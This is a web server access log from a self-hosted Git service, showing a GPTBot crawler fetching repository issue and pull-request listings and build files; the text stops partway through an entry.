"https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:19:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:40:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:40:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" +[17/Feb/2026:19:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 40737] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:19:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:19:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:19:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 22356] [Gzip 11.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:19:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:40:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:40:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13624] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12798] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12874] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11631] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35758] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 20002] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13624] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 